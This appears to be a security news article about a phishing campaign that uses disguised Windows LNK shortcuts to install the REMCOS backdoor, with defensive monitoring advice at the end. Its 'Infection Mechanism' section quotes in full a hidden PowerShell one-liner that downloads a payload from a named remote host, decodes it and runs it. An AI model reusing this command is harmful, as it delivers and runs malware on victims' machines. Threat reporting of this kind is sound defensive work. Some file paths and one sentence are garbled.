New Malware Attack Weaponizing LNK Files to Install The REMCOS Backdoor on Windows Machines

In recent weeks, cybersecurity teams have observed a surge in malicious campaigns exploiting Windows shortcut (LNK) files to deliver sophisticated backdoors.

This new wave of attacks disguises LNK shortcuts as innocuous documents or folders, relying on Windows’ default behavior of hiding known file extensions to deceive users.

Once executed, the shortcut silently invokes PowerShell with hidden window parameters, fetching and decoding a Base64 payload that ultimately installs the REMCOS backdoor.

The stealthy nature of this chain—combining social engineering, fileless scripting, and living-off-the-land binaries—underscores the evolving tactics of threat actors targeting enterprise environments.

Point Wild analysts noted that the initial delivery often arrives via phishing emails, with attachments labeled as invoices or shipping documents.

In other cases, threat actors plant these malicious shortcuts within ZIP or RAR archives on network shares, counting on casual browsing to trigger execution.

Upon double-clicking, the LNK file silently launches powershell.exe -WindowStyle hidden -Command (…), directing the victim’s machine to download an obfuscated payload from a remote server.

Point Wild researchers identified that the downloaded file masquerades with a .GIF extension but contains Base64-encoded binary data.

The campaign’s backbone is a multi-stage infection workflow. The embedded PowerShell script retrieves an encoded text resource, writes it to C:ProgramDataHEW.GIF, decodes it into a Windows PIF file named CHROME.PIF via [System.Convert]::FromBase64String, then executes this binary.

The PIF file, disguised as a Chrome-themed program, leverages legacy support for MS-DOS shortcuts to bypass modern security warnings. Once launched, it drops additional artifacts—including a scheduled task shortcut and a URL file—to ensure persistence and facilitate further payload execution.

Impact assessments reveal that the REMCOS backdoor grants attackers full remote control over compromised hosts.

REMCOS communicates over TCP with a custom binary protocol, enabling arbitrary shell command execution, file transfer, keylogging, and even webcam capture.

Victims often remain unaware of the breach, as the malware stores keystroke logs in C:ProgramDataremcoslogs.dat and establishes encrypted channels with command-and-control servers hosted in Eastern Europe.

The combination of stealthy execution and robust remote capabilities poses a significant risk to corporate networks, where lateral movement and data exfiltration can follow initial compromise.

Infection Mechanism

The infection mechanism hinges on exploiting LNK file properties to load malicious commands. Unlike Office macros, LNK files do not trigger macro security warnings, allowing execution without user suspicion.

In this campaign, the LNK’s “Target” field is set to:-

C:windowsSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://shipping-hr.ro/m/r/r.txt','C:\ProgramData\HEW.GIF'); $file="C:\ProgramData\HEW.GIF"; [System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\ProgramData\CHROME.PIF -Encoding Byte; start C:\ProgramData\CHROME.PIF

This single-line command demonstrates the elegance of fileless attacks: it uses System.Net.WebClient to fetch the Base64 blob, then decodes and executes it entirely in memory.

While the infection workflow shows that how Windows displays the deceptive .lnk icon, hiding the actual payload path.

Attackers further obfuscate detection by embedding malware within Alternate Data Streams or crafting the icon path to point to malicious DLLs, triggering code execution when Windows attempts to render the shortcut icon.

By weaponizing LNK files, adversaries bypass many endpoint protections that focus on executable file blocks and macro detections.

The reliance on trusted system binaries, such as PowerShell and CMD, allows the REMCOS installer to evade signature-based antivirus tools.

For defenders, monitoring unusual PowerShell invocations and outbound connections to suspicious domains like shipping-hr.ro is critical.

Enhanced visibility into scheduled tasks, ADS usage, and newly created .PIF files can help identify and contain this growing threat.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches